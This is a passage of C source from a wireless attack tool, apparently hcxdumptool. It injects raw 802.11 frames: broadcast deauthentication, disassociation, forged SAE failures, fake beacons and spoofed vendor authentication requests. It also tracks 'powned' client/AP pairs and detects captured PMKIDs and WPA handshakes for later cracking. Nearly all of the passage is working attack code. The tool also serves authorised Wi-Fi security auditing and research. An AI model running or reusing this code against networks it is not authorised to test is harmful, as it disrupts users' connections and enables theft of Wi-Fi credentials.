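for(c = 0; c < filterlist_len; c++)
	{
	if(memcmp(zeiger->addr, filtermac, 6) == 0)
		{
		return true;
		}
	zeiger++;
	}
return false;
}
/*===========================================================================*/
/*
 * Return the recorded status bits (RX_* flags) for an AP MAC, 0 if the AP
 * has no entry. The list is scanned up to the first unused slot
 * (timestamp == 0) or POWNEDLIST_MAX entries.
 *
 * macap: 6-byte AP MAC (matched against addr2).
 */
static inline int checkpownedap(uint8_t *macap)
{
static int c;
static macmaclist_t *zeiger;

zeiger = pownedlist;
for(c = 0; c < POWNEDLIST_MAX; c++)
	{
	if(zeiger->timestamp == 0)
		{
		return 0;
		}
	if(memcmp(zeiger->addr2, macap, 6) == 0)
		{
		return zeiger->status;
		}
	zeiger++;
	}
return 0;
}
/*===========================================================================*/
/*
 * Return the recorded status bits for a (client, AP) pair, 0 if there is
 * no entry.
 *
 * pownedmacsta: 6-byte client MAC (addr1).
 * pownedmacap:  6-byte AP MAC (addr2).
 */
static inline int checkpownedstaap(uint8_t *pownedmacsta, uint8_t *pownedmacap)
{
static int c;
static macmaclist_t *zeiger;

zeiger = pownedlist;
for(c = 0; c < POWNEDLIST_MAX; c++)
	{
	if(zeiger->timestamp == 0)
		{
		return 0;
		}
	if((memcmp(zeiger->addr1, pownedmacsta, 6) == 0) && (memcmp(zeiger->addr2, pownedmacap, 6) == 0))
		{
		return zeiger->status;
		}
	zeiger++;
	}
return 0;
}
/*===========================================================================*/
/*
 * Record status bits for a (client, AP) pair.
 *
 * Returns the existing status when the pair already has every bit of
 * status set (nothing new), otherwise 0. pownedcount is incremented when
 * a status above RX_M1 is newly recorded. After a new entry is added the
 * list is re-sorted by time.
 *
 * The scan stops at POWNEDLIST_MAX -1, so when the list is full the last
 * slot is overwritten by the new entry.
 */
static inline int addpownedstaap(uint8_t *pownedmacsta, uint8_t *pownedmacap, uint8_t status)
{
static int c;
static macmaclist_t *zeiger;

zeiger = pownedlist;
for(c = 0; c < POWNEDLIST_MAX -1; c++)
	{
	if(zeiger->timestamp == 0)
		{
		break;
		}
	if((memcmp(zeiger->addr1, pownedmacsta, 6) == 0) && (memcmp(zeiger->addr2, pownedmacap, 6) == 0))
		{
		if((zeiger->status & status) == status)
			{
			return zeiger->status;
			}
		zeiger->status |= status;
		if(status > RX_M1)
			{
			pownedcount++;
			}
		return 0;
		}
	zeiger++;
	}
zeiger->timestamp = timestamp;
zeiger->status = status;
memcpy(zeiger->addr1, pownedmacsta, 6);
memcpy(zeiger->addr2, pownedmacap, 6);
if(status > RX_M1)
	{
	pownedcount++;
	}
qsort(pownedlist, c +1, MACMACLIST_SIZE, sort_macmaclist_by_time);
return 0;
}
/*===========================================================================*/
/*
 * Transmit an EAPOL/EAP Request-Identity data frame addressed to macsta
 * with macap as sender (from_ds set).
 *
 * The frame is skipped when the filter list excludes the client
 * (filtermode 1 = protection list, 2 = target list). A failed write()
 * is reported via perror and counted in errorcount; outgoingcount is only
 * advanced for successful sends (decremented before the unconditional
 * increment on failure).
 */
static void send_requestidentity(uint8_t *macsta, uint8_t *macap)
{
static mac_t *macftx;
/* LLC/SNAP header, EAPOL (0x888e) EAP-Packet, EAP Request id 1, type Identity, "hello" */
static const uint8_t requestidentitydata[] =
{
0xaa, 0xaa, 0x03, 0x00, 0x00, 0x00, 0x88, 0x8e, 0x01, 0x00, 0x00, 0x0a, 0x01, 0x63, 0x00, 0x0a, 0x01, 0x68, 0x65, 0x6c, 0x6c, 0x6f
};
#define REQUESTIDENTITY_SIZE sizeof(requestidentitydata)
static uint8_t packetout[1024];

if((filtermode == 1) && (checkfilterlistentry(macsta) == true))
	{
	return;
	}
if((filtermode == 2) && (checkfilterlistentry(macsta) == false))
	{
	return;
	}
memset(&packetout, 0, HDRRT_SIZE +MAC_SIZE_QOS +REQUESTIDENTITY_SIZE +1);
memcpy(&packetout, &hdradiotap, HDRRT_SIZE);
macftx = (mac_t*)(packetout +HDRRT_SIZE);
macftx->type = IEEE80211_FTYPE_DATA;
macftx->subtype = IEEE80211_STYPE_QOS_DATA;
memcpy(macftx->addr1, macsta, 6);
memcpy(macftx->addr2, macap, 6);
memcpy(macftx->addr3, macap, 6);
macftx->from_ds = 1;
macftx->duration = 0x002c;
/* 12-bit sequence number lives in the upper bits of the field */
macftx->sequence = myidrequestsequence++ << 4;
if(myidrequestsequence >= 4096)
	{
	myidrequestsequence = 0;
	}
memcpy(&packetout[HDRRT_SIZE +MAC_SIZE_QOS], &requestidentitydata, REQUESTIDENTITY_SIZE);
if(write(fd_socket, packetout, HDRRT_SIZE +MAC_SIZE_QOS +REQUESTIDENTITY_SIZE) < 0)
	{
	perror("\nfailed to transmit requestidentity");
	errorcount++;
	outgoingcount--;
	}
/* fsync() on a raw socket has no effect; its result is ignored */
fsync(fd_socket);
outgoingcount++;
return;
}
/*===========================================================================*/
/*
 * Transmit a disassociation management frame to macsta with macap as
 * sender and the given reason code.
 *
 * Skipped when the filter list excludes the AP, or when the pair already
 * has a PMKID or M2/M3 recorded (nothing more to gain). Clients using
 * protected management frames (802.11w) ignore such unprotected frames.
 *
 * Fixed: the perror text said "deuthentication"; it now names the frame
 * that actually failed.
 */
static void send_disassociation(uint8_t *macsta, uint8_t *macap, uint8_t reason)
{
static uint8_t retstatus;
static mac_t *macftx;
static uint8_t packetout[1024];

if((filtermode == 1) && (checkfilterlistentry(macap) == true))
	{
	return;
	}
if((filtermode == 2) && (checkfilterlistentry(macap) == false))
	{
	return;
	}
retstatus = checkpownedstaap(macsta, macap);
if((retstatus &RX_PMKID) == RX_PMKID)
	{
	return;
	}
if((retstatus &RX_M23) == RX_M23)
	{
	return;
	}
memset(&packetout, 0, HDRRT_SIZE +MAC_SIZE_NORM +2 +1);
memcpy(&packetout, &hdradiotap, HDRRT_SIZE);
macftx = (mac_t*)(packetout +HDRRT_SIZE);
macftx->type = IEEE80211_FTYPE_MGMT;
macftx->subtype = IEEE80211_STYPE_DISASSOC;
memcpy(macftx->addr1, macsta, 6);
memcpy(macftx->addr2, macap, 6);
memcpy(macftx->addr3, macap, 6);
macftx->duration = 0x013a;
macftx->sequence = mydisassociationsequence++ << 4;
if(mydisassociationsequence >= 4096)
	{
	mydisassociationsequence = 0;
	}
/* 2-byte reason code field; the high byte stays 0 */
packetout[HDRRT_SIZE +MAC_SIZE_NORM] = reason;
if(write(fd_socket, packetout, HDRRT_SIZE +MAC_SIZE_NORM +2) < 0)
	{
	perror("\nfailed to transmit disassociation");
	errorcount++;
	outgoingcount--;
	}
fsync(fd_socket);
outgoingcount++;
return;
}
/*===========================================================================*/
/*
 * Transmit an SAE authentication frame carrying a failure status to
 * macsta with macap as sender, using saesequence +1 as sequence number.
 *
 * Same filter-list and already-recorded-status checks as
 * send_disassociation.
 *
 * Fixed: the perror text said "deuthentication"; it now names the frame
 * that actually failed.
 */
static void send_saefailure(uint8_t *macsta, uint8_t *macap, uint16_t saesequence)
{
static uint8_t retstatus;
static mac_t *macftx;
/* auth algorithm 3 (SAE), transaction 2, status 1 */
static const uint8_t saeerrordata[] =
{
0x03, 0x00, 0x02, 0x00, 0x01, 0x00
};
#define SEAERROR_SIZE sizeof(saeerrordata)
static uint8_t packetout[1024];

if((filtermode == 1) && (checkfilterlistentry(macap) == true))
	{
	return;
	}
if((filtermode == 2) && (checkfilterlistentry(macap) == false))
	{
	return;
	}
retstatus = checkpownedstaap(macsta, macap);
if((retstatus &RX_PMKID) == RX_PMKID)
	{
	return;
	}
if((retstatus &RX_M23) == RX_M23)
	{
	return;
	}
memset(&packetout, 0, HDRRT_SIZE +MAC_SIZE_NORM +2 +1);
memcpy(&packetout, &hdradiotap, HDRRT_SIZE);
macftx = (mac_t*)(packetout +HDRRT_SIZE);
macftx->type = IEEE80211_FTYPE_MGMT;
macftx->subtype = IEEE80211_STYPE_AUTH;
memcpy(macftx->addr1, macsta, 6);
memcpy(macftx->addr2, macap, 6);
memcpy(macftx->addr3, macap, 6);
macftx->duration = 0x013a;
saesequence++;
if(saesequence >= 4096)
	{
	saesequence = 0;
	}
macftx->sequence = saesequence << 4;
memcpy(&packetout[HDRRT_SIZE +MAC_SIZE_NORM], &saeerrordata, SEAERROR_SIZE);
if(write(fd_socket, packetout, HDRRT_SIZE +MAC_SIZE_NORM +SEAERROR_SIZE) < 0)
	{
	perror("\nfailed to transmit sae failure");
	errorcount++;
	outgoingcount--;
	}
fsync(fd_socket);
outgoingcount++;
return;
}
/*===========================================================================*/
/*
 * Transmit a deauthentication management frame to the broadcast address
 * with macap as sender and the given reason code.
 *
 * Skipped when the filter list excludes the AP or the AP already has a
 * PMKID or M2/M3 recorded. Networks with protected management frames
 * (802.11w) discard unprotected deauthentications.
 */
static void send_broadcast_deauthentication(uint8_t *macap, uint8_t reason)
{
static uint8_t retstatus;
static mac_t *macftx;
static uint8_t packetout[1024];

if((filtermode == 1) && (checkfilterlistentry(macap) == true))
	{
	return;
	}
if((filtermode == 2) && (checkfilterlistentry(macap) == false))
	{
	return;
	}
retstatus = checkpownedap(macap);
if((retstatus &RX_PMKID) == RX_PMKID)
	{
	return;
	}
if((retstatus &RX_M23) == RX_M23)
	{
	return;
	}
memset(&packetout, 0, HDRRT_SIZE +MAC_SIZE_NORM +2 +1);
memcpy(&packetout, &hdradiotap, HDRRT_SIZE);
macftx = (mac_t*)(packetout +HDRRT_SIZE);
macftx->type = IEEE80211_FTYPE_MGMT;
macftx->subtype = IEEE80211_STYPE_DEAUTH;
memcpy(macftx->addr1, &mac_broadcast, 6);
memcpy(macftx->addr2, macap, 6);
memcpy(macftx->addr3, macap, 6);
macftx->duration = 0x013a;
macftx->sequence = mydeauthenticationsequence++ << 4;
if(mydeauthenticationsequence >= 4096)
	{
	mydeauthenticationsequence = 0;
	}
/* 2-byte reason code field; the high byte stays 0 */
packetout[HDRRT_SIZE +MAC_SIZE_NORM] = reason;
if(write(fd_socket, packetout, HDRRT_SIZE +MAC_SIZE_NORM +2) < 0)
	{
	perror("\nfailed to transmit deauthentication to broadcast");
	errorcount++;
	outgoingcount--;
	}
fsync(fd_socket);
outgoingcount++;
return;
}
/*===========================================================================*/
/*
 * Transmit an open-system authentication response (transaction 2,
 * status 0) to macsta with macap as sender.
 *
 * Skipped when the filter list excludes the client, or when the pair's
 * recorded status is above RX_PMKID. Note that the sequence counter shared
 * with send_authenticationrequestopensystem
 * (myauthenticationrequestsequence) is used here, not
 * myauthenticationresponsesequence.
 */
static inline void send_authenticationresponseopensystem(uint8_t *macsta, uint8_t *macap)
{
static mac_t *macftx;
static const uint8_t authenticationresponsedata[] =
{
0x00, 0x00, 0x02, 0x00, 0x00, 0x00
};
#define AUTHENTICATIONRESPONSE_SIZE sizeof(authenticationresponsedata)
static uint8_t packetout[1024];

if((filtermode == 1) && (checkfilterlistentry(macsta) == true))
	{
	return;
	}
if((filtermode == 2) && (checkfilterlistentry(macsta) == false))
	{
	return;
	}
if(checkpownedstaap(macsta, macap) > RX_PMKID)
	{
	return;
	}
memset(&packetout, 0, HDRRT_SIZE +MAC_SIZE_NORM +AUTHENTICATIONRESPONSE_SIZE +1);
memcpy(&packetout, &hdradiotap, HDRRT_SIZE);
macftx = (mac_t*)(packetout +HDRRT_SIZE);
macftx->type = IEEE80211_FTYPE_MGMT;
macftx->subtype = IEEE80211_STYPE_AUTH;
memcpy(macftx->addr1, macsta, 6);
memcpy(macftx->addr2, macap, 6);
memcpy(macftx->addr3, macap, 6);
macftx->duration = 0x013a;
macftx->sequence = myauthenticationrequestsequence++ << 4;
if(myauthenticationrequestsequence >= 4096)
	{
	myauthenticationrequestsequence = 0;
	}
memcpy(&packetout[HDRRT_SIZE +MAC_SIZE_NORM], &authenticationresponsedata, AUTHENTICATIONRESPONSE_SIZE);
if(write(fd_socket, packetout, HDRRT_SIZE +MAC_SIZE_NORM +AUTHENTICATIONRESPONSE_SIZE) < 0)
	{
	perror("\nfailed to transmit authenticationresponse");
	errorcount++;
	outgoingcount--;
	}
fsync(fd_socket);
outgoingcount++;
return;
}
/*===========================================================================*/
/*
 * Transmit an open-system authentication request (transaction 1) from
 * the tool's own client MAC (mac_mysta) to mac_ap.
 *
 * A vendor-specific IE imitating the configured client chipset
 * (stachipset, one of the CS_* values) is appended so the frame resembles
 * that vendor's station; an unknown chipset appends nothing.
 *
 * Skipped when the filter list excludes the AP or the (mac_mysta, mac_ap)
 * pair already has any status recorded.
 */
static inline void send_authenticationrequestopensystem(uint8_t *mac_ap)
{
static int cssize;
static mac_t *macftx;
static const uint8_t authenticationrequestdata[] =
{
0x00, 0x00, 0x01, 0x00, 0x00, 0x00
};
#define MYAUTHENTICATIONREQUEST_SIZE sizeof(authenticationrequestdata)
static const uint8_t csbroadcom[] =
{
0xdd, 0x09, 0x00, 0x10, 0x18, 0x02, 0x02, 0xf0, 0x05, 0x00, 0x00
};
#define CSBROADCOM_SIZE sizeof(csbroadcom)
static const uint8_t csapplebroadcom[] =
{
0xdd, 0x0b, 0x00, 0x17, 0xf2, 0x0a, 0x00, 0x01, 0x04, 0x00, 0x00, 0x00, 0x00,
0xdd, 0x09, 0x00, 0x10, 0x18, 0x02, 0x00, 0x00, 0x10, 0x00, 0x00
};
#define CSAPPLEBROADCOM_SIZE sizeof(csapplebroadcom)
static const uint8_t cssonos[] =
{
0xdd, 0x06, 0x00, 0x0e, 0x58, 0x02, 0x01, 0x01
};
#define CSSONOS_SIZE sizeof(cssonos)
static const uint8_t csnetgearbroadcom[] =
{
0xdd, 0x06, 0x00, 0x14, 0x6c, 0x00, 0x00, 0x00,
0xdd, 0x09, 0x00, 0x10, 0x18, 0x02, 0x04, 0x00, 0x1c, 0x00, 0x00
};
#define CSNETGEARBROADCOM_SIZE sizeof(csnetgearbroadcom)
static const uint8_t cswilibox[] =
{
0xdd, 0x0f, 0x00, 0x19, 0x3b, 0x02, 0x04, 0x08, 0x00, 0x00, 0x00, 0x03, 0x04, 0x01, 0x00, 0x00, 0x00
};
#define CSWILIBOX_SIZE sizeof(cswilibox)
static const uint8_t cscisco[] =
{
0xdd, 0x1d, 0x00, 0x40, 0x96, 0x0c, 0x01, 0xb2, 0xb1, 0x74, 0xea, 0x45, 0xc5, 0x65, 0x01, 0x00, 0x00,
0xb9, 0x16, 0x00, 0x00, 0x00, 0x00, 0x1a, 0xc1, 0xdb, 0xf1, 0xf5, 0x05, 0xec, 0xed
};
#define CSCISCO_SIZE sizeof(cscisco)
static uint8_t packetout[1024];

if((filtermode == 1) && (checkfilterlistentry(mac_ap) == true))
	{
	return;
	}
if((filtermode == 2) && (checkfilterlistentry(mac_ap) == false))
	{
	return;
	}
if(checkpownedstaap(mac_mysta, mac_ap) > 0)
	{
	return;
	}
memset(&packetout, 0, HDRRT_SIZE +MAC_SIZE_NORM +MYAUTHENTICATIONREQUEST_SIZE +1);
memcpy(&packetout, &hdradiotap, HDRRT_SIZE);
macftx = (mac_t*)(packetout +HDRRT_SIZE);
macftx->type = IEEE80211_FTYPE_MGMT;
macftx->subtype = IEEE80211_STYPE_AUTH;
memcpy(macftx->addr1, mac_ap, 6);
memcpy(macftx->addr2, &mac_mysta, 6);
memcpy(macftx->addr3, mac_ap, 6);
macftx->duration = 0x013a;
macftx->sequence = myauthenticationrequestsequence++ << 4;
if(myauthenticationrequestsequence >= 4096)
	{
	myauthenticationrequestsequence = 0;
	}
memcpy(&packetout[HDRRT_SIZE +MAC_SIZE_NORM], &authenticationrequestdata, MYAUTHENTICATIONREQUEST_SIZE);
if(stachipset == CS_BROADCOM)
	{
	memcpy(&packetout[HDRRT_SIZE +MAC_SIZE_NORM +MYAUTHENTICATIONREQUEST_SIZE], &csbroadcom, CSBROADCOM_SIZE);
	cssize = CSBROADCOM_SIZE;
	}
else if(stachipset == CS_APPLE_BROADCOM)
	{
	memcpy(&packetout[HDRRT_SIZE +MAC_SIZE_NORM +MYAUTHENTICATIONREQUEST_SIZE], &csapplebroadcom, CSAPPLEBROADCOM_SIZE);
	cssize = CSAPPLEBROADCOM_SIZE;
	}
else if(stachipset == CS_SONOS)
	{
	memcpy(&packetout[HDRRT_SIZE +MAC_SIZE_NORM +MYAUTHENTICATIONREQUEST_SIZE], &cssonos, CSSONOS_SIZE);
	cssize = CSSONOS_SIZE;
	}
else if(stachipset == CS_NETGEARBROADCOM)
	{
	memcpy(&packetout[HDRRT_SIZE +MAC_SIZE_NORM +MYAUTHENTICATIONREQUEST_SIZE], &csnetgearbroadcom, CSNETGEARBROADCOM_SIZE);
	cssize = CSNETGEARBROADCOM_SIZE;
	}
else if(stachipset == CS_WILIBOX)
	{
	memcpy(&packetout[HDRRT_SIZE +MAC_SIZE_NORM +MYAUTHENTICATIONREQUEST_SIZE], &cswilibox, CSWILIBOX_SIZE);
	cssize = CSWILIBOX_SIZE;
	}
else if(stachipset == CS_CISCO)
	{
	memcpy(&packetout[HDRRT_SIZE +MAC_SIZE_NORM +MYAUTHENTICATIONREQUEST_SIZE], &cscisco, CSCISCO_SIZE);
	cssize = CSCISCO_SIZE;
	}
else
	{
	cssize = 0;
	}
if(write(fd_socket, packetout, HDRRT_SIZE +MAC_SIZE_NORM +MYAUTHENTICATIONREQUEST_SIZE +cssize) < 0)
	{
	perror("\nfailed to transmit authenticationrequest");
	errorcount++;
	outgoingcount--;
	}
fsync(fd_socket);
outgoingcount++;
return;
}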
/*===========================================================================*/ static inline void send_directed_proberequest(uint8_t *macap, int essid_len, uint8_t *essid) { static mac_t *macftx; static uint8_t *beaconptr; static int beaconlen; static uint8_t *essidtagptr; static ietag_t *essidtag; static const uint8_t directedproberequestdata[] = { 0x01, 0x08, 0x82, 0x84, 0x8b, 0x96, 0x8c, 0x92, 0x98, 0xa4, 0x32, 0x04, 0xb0, 0x48, 0x60, 0x6c }; #define DIRECTEDPROBEREQUEST_SIZE sizeof(directedproberequestdata) static uint8_t packetout[1024]; if((filtermode == 1) && (checkfilterlistentry(macap) == true)) { return; } if((filtermode == 2) && (checkfilterlistentry(macap) == false)) { return; } if(checkpownedstaap(mac_mysta, macap) != 0) { return; } memset(&packetout, 0, HDRRT_SIZE +MAC_SIZE_NORM +ESSID_LEN_MAX +DIRECTEDPROBEREQUEST_SIZE +1); memcpy(&packetout, &hdradiotap, HDRRT_SIZE); macftx = (mac_t*)(packetout +HDRRT_SIZE); macftx->type = IEEE80211_FTYPE_MGMT; macftx->subtype = IEEE80211_STYPE_PROBE_REQ; memcpy(macftx->addr1, macap, 6); memcpy(macftx->addr2, &mac_mysta, 6); memcpy(macftx->addr3, macap, 6); macftx->sequence = myproberequestsequence++ << 4; if(myproberequestsequence >= 4096) { myproberequestsequence= 0; } beaconptr = payload_ptr +CAPABILITIESAP_SIZE; beaconlen = payload_len -CAPABILITIESAP_SIZE; essidtagptr = gettag(TAG_SSID, beaconptr, beaconlen); if(essidtagptr == NULL) { return; } essidtag = (ietag_t*)essidtagptr; if(essidtag->len > ESSID_LEN_MAX) { return; } packetout[HDRRT_SIZE +MAC_SIZE_NORM] = 0; packetout[HDRRT_SIZE +MAC_SIZE_NORM +1] = essid_len; memcpy(&packetout[HDRRT_SIZE +MAC_SIZE_NORM +IETAG_SIZE], essid, essid_len); memcpy(&packetout[HDRRT_SIZE +MAC_SIZE_NORM +IETAG_SIZE +essid_len], &directedproberequestdata, DIRECTEDPROBEREQUEST_SIZE); if(write(fd_socket, packetout, HDRRT_SIZE +MAC_SIZE_NORM +IETAG_SIZE +essid_len +DIRECTEDPROBEREQUEST_SIZE) < 0) { perror("\nfailed to transmit directed proberequest"); errorcount++; outgoingcount--; 
} fsync(fd_socket); outgoingcount++; return; } /*===========================================================================*/ static inline void send_undirected_proberequest() { static mac_t *macftx; static const uint8_t undirectedproberequestdata[] = { 0x00, 0x00, 0x01, 0x08, 0x82, 0x84, 0x8b, 0x96, 0x8c, 0x92, 0x98, 0xa4, 0x32, 0x04, 0xb0, 0x48, 0x60, 0x6c }; #define UNDIRECTEDPROBEREQUEST_SIZE sizeof(undirectedproberequestdata) static uint8_t packetout[1024]; memset(&packetout, 0, HDRRT_SIZE +MAC_SIZE_NORM +ESSID_LEN_MAX +UNDIRECTEDPROBEREQUEST_SIZE +1); memcpy(&packetout, &hdradiotap, HDRRT_SIZE); macftx = (mac_t*)(packetout +HDRRT_SIZE); macftx->type = IEEE80211_FTYPE_MGMT; macftx->subtype = IEEE80211_STYPE_PROBE_REQ; memcpy(macftx->addr1, &mac_broadcast, 6); memcpy(macftx->addr2, &mac_mysta, 6); memcpy(macftx->addr3, &mac_broadcast, 6); macftx->sequence = myproberequestsequence++ << 4; if(myproberequestsequence >= 4096) { myproberequestsequence= 0; } memcpy(&packetout[HDRRT_SIZE +MAC_SIZE_NORM], &undirectedproberequestdata, UNDIRECTEDPROBEREQUEST_SIZE); if(write(fd_socket, packetout, HDRRT_SIZE +MAC_SIZE_NORM +UNDIRECTEDPROBEREQUEST_SIZE) < 0) { perror("\nfailed to transmit undirected proberequest"); errorcount++; outgoingcount--; } fsync(fd_socket); outgoingcount++; return; } /*===========================================================================*/ static void send_broadcastbeacon() { static mac_t *macftx; static capap_t *capap; static const uint8_t broadcastbeacondata[] = { 0x00, 0x00, 0x01, 0x08, 0x82, 0x84, 0x8b, 0x96, 0x8c, 0x12, 0x98, 0x24, 0x03, 0x01, 0x0d, 0x05, 0x04, 0x00, 0x01, 0x00, 0x00, 0x2a, 0x01, 0x00, 0x32, 0x04, 0xb0, 0x48, 0x60, 0x6c, 0x2d, 0x1a, 0xef, 0x11, 0x1b, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x04, 0x06, 0xe6, 0x47, 0x0d, 0x00, 0x3d, 0x16, 0x0d, 0x0f, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x4a, 0x0e, 0x14, 0x00, 0x0a, 0x00, 0x2c, 0x01, 0xc8, 0x00, 0x14, 0x00, 0x05, 0x00, 0x19, 0x00, 0x7f, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0xdd, 0x18, 0x00, 0x50, 0xf2, 0x02, 0x01, 0x01, 0x00, 0x00, 0x03, 0xa4, 0x00, 0x00, 0x27, 0xa4, 0x00, 0x00, 0x42, 0x43, 0x5e, 0x00, 0x62, 0x32, 0x2f, 0x00, 0xdd, 0x09, 0x00, 0x03, 0x7f, 0x01, 0x01, 0x00, 0x00, 0xff, 0x7f, 0xdd, 0x0c, 0x00, 0x04, 0x0e, 0x01, 0x01, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x30, 0x14, 0x01, 0x00, 0x00, 0x0f, 0xac, 0x04, 0x01, 0x00, 0x00, 0x0f, 0xac, 0x04, 0x01, 0x00, 0x00, 0x0f, 0xac, 0x02, 0x00, 0x00, 0xdd, 0x18, 0x00, 0x50, 0xf2, 0x04, 0x10, 0x4a, 0x00, 0x01, 0x10, 0x10, 0x44, 0x00, 0x01, 0x02, 0x10, 0x49, 0x00, 0x06, 0x00, 0x37, 0x2a, 0x00, 0x01, 0x20 }; #define BROADCASTBEACON_SIZE sizeof(broadcastbeacondata) static uint8_t packetout[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE +BROADCASTBEACON_SIZE +1]; memset(&packetout, 0, HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE +BROADCASTBEACON_SIZE +1); memcpy(&packetout, &hdradiotap, HDRRT_SIZE); macftx = (mac_t*)(packetout +HDRRT_SIZE); macftx->type = IEEE80211_FTYPE_MGMT; macftx->subtype = IEEE80211_STYPE_BEACON; memcpy(macftx->addr1, &mac_broadcast, 6); memcpy(macftx->addr2, &mac_myap, 6); memcpy(macftx->addr3, &mac_myap, 6); macftx->sequence = mybeaconsequence++ << 4; if(mybeaconsequence >= 4096) { mybeaconsequence = 0; } capap = (capap_t*)(packetout +HDRRT_SIZE +MAC_SIZE_NORM); capap->timestamp = mytime++; capap->beaconintervall = 0x64; capap->capabilities = 0x431; packetout[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE] = 0; memcpy(&packetout[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE], &broadcastbeacondata, BROADCASTBEACON_SIZE); packetout[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE +0x0e] = channelscanlist[cpa]; if(write(fd_socket, packetout, HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE +BROADCASTBEACON_SIZE) < 0) { perror("\nfailed to transmit broadcast beacon"); errorcount++; outgoingcount--; } 
fsync(fd_socket);
outgoingcount++;
return;
}
/*===========================================================================*/
/*
 * Decide whether an EAPOL-Key body carries a usable PMKID KDE.
 *
 * authlen    : EAPOL body length as announced by the 802.1X header (host order)
 * authpacket : start of the EAPOL-Key body (the wpakey_t header)
 *
 * Only the KDE at the fixed offset directly behind the key header is examined.
 * Returns true when the body is long enough for wpakey_t + pmkid_t, the KDE id
 * is 0xdd or 0x14, the OUI is 00:0f:ac, the data type is 0x04 and the 16-byte
 * PMKID differs from nulliv (presumably a 16-byte zero block -- confirm).
 * Everything else is rejected so that all-zero placeholder KDEs are not
 * reported as a captured PMKID.
 */
static inline bool detectpmkid(uint16_t authlen, uint8_t *authpacket)
{
static pmkid_t *pmkid;
static uint8_t pmkidoui[] = { 0x00, 0x0f, 0xac };
#define PMKIDOUI_SIZE sizeof(pmkidoui)
/* length gate first: every check below dereferences authpacket +WPAKEY_SIZE */
if(authlen < WPAKEY_SIZE +PMKID_SIZE) { return false; }
pmkid = (pmkid_t*)(authpacket +WPAKEY_SIZE);
if((pmkid->id != 0xdd) && (pmkid->id != 0x14)) { return false; }
if(memcmp(&pmkidoui, pmkid->oui, PMKIDOUI_SIZE) != 0) { return false; }
if(pmkid->type != 0x04) { return false; }
/* an all-zero PMKID is not worth recording */
if(memcmp(pmkid->pmkid, &nulliv, 16) == 0) { return false; }
return true;
}
/*===========================================================================*/
/*
 * Classify an 802.1X/EAPOL frame and track 4-way handshake state.
 *
 * Operates on the globals describing the current frame (payload_ptr,
 * payload_len, macfrx, timestamp) and on the last-seen M1/M2 state
 * (laststam1/lastapm1/lastrcm1/lasttimestampm1 and the m2 counterparts).
 * Every local is static, so the function keeps state between calls and is
 * not reentrant.
 *
 * EAPOL_KEY frames are dispatched on the key-info class returned by
 * getkeyinfo() (1 = M1, 2 = M2, 3 = M3, 4 = M4); other EAPOL types are
 * written to the pcapng file (when one is open) and, for EAP identity
 * exchanges, printed when STATUS_EAPOL is enabled.
 */
static inline void process80211eap()
{
static uint8_t *eapauthptr;
static eapauth_t *eapauth;
static int eapauthlen;
static uint16_t authlen;
static wpakey_t *wpak;
static uint16_t keyinfo;
static unsigned long long int rc;
static int calceapoltimeout;
static exteap_t *exteap;
static uint16_t exteaplen;
/* the 802.1X header follows the LLC/SNAP header inside the data payload */
eapauthptr = payload_ptr +LLC_SIZE;
eapauthlen = payload_len -LLC_SIZE;
eapauth = (eapauth_t*)eapauthptr;
/* NOTE(review): eapauth->len is read before eapauthlen is known to cover a
 * full eapauth_t; the check below rejects a negative remainder, but the header
 * read itself relies on the capture buffer being large enough -- confirm */
authlen = ntohs(eapauth->len);
/* announced body length must fit into what was actually captured */
if(authlen > (eapauthlen -4)) { return; }
if(eapauth->type == EAPOL_KEY)
	{
	/* NOTE(review): no check that authlen covers a whole wpakey_t before
	 * keyinfo/replaycount are read -- assumes the buffer is large enough */
	wpak = (wpakey_t*)(eapauthptr +EAPAUTH_SIZE);
	keyinfo = (getkeyinfo(ntohs(wpak->keyinfo)));
	rc = be64toh(wpak->replaycount);
	if(keyinfo == 1)
		{
		/* M1 addressed to our own station: record it, but do not write it out */
		if((authlen == 95) && (memcmp(macfrx->addr1, &mac_mysta, 6) == 0)) { addpownedstaap(macfrx->addr1, macfrx->addr2, RX_M1); return; }
		if(fd_pcapng != 0) { writeepb(fd_pcapng); }
		/* replay counter equals rcrandom, the value send_m1() puts into the M1
		 * frames this tool transmits -- presumably our own frame seen on the
		 * monitor interface; remember it so a matching M2 can be paired below */
		if(rc == rcrandom) { memcpy(&laststam1, macfrx->addr1, 6); memcpy(&lastapm1, macfrx->addr2, 6); lastrcm1 = rc; lasttimestampm1 = timestamp; return; }
		/* anything longer than the bare M1 may carry a PMKID KDE */
		if(authlen > 95)
			{
			if(detectpmkid(authlen, eapauthptr +EAPAUTH_SIZE) == true)
				{
				/* report only the first PMKID seen for this sta/ap pair */
				if((addpownedstaap(macfrx->addr1, macfrx->addr2, RX_PMKID) & RX_PMKID) != RX_PMKID)
					{
					if((statusout & STATUS_EAPOL) == STATUS_EAPOL)
						{
						printtimenet(macfrx->addr1, macfrx->addr2);
						if(memcmp(macfrx->addr1, &mac_mysta, 6) == 0) { fprintf(stdout, " [FOUND PMKID CLIENT-LESS]\n"); } else { fprintf(stdout, " [FOUND PMKID]\n"); }
						}
					}
				return;
				}
			}
		return;
		}
	if(keyinfo == 3)
		{
		if(fd_pcapng != 0) { writeepb(fd_pcapng); }
		/* M3 completes a handshake only if it arrives within eapoltimeout of the
		 * recorded M2, with replay counter +1 and the same sta/ap pair */
		calceapoltimeout = timestamp -lasttimestampm2;
		if((calceapoltimeout < eapoltimeout) && ((rc -lastrcm2) == 1) && (memcmp(&laststam2,macfrx->addr1, 6) == 0) && (memcmp(&lastapm2, macfrx->addr2, 6) == 0))
			{
			if(addpownedstaap(macfrx->addr1, macfrx->addr2, RX_M23) == false)
				{
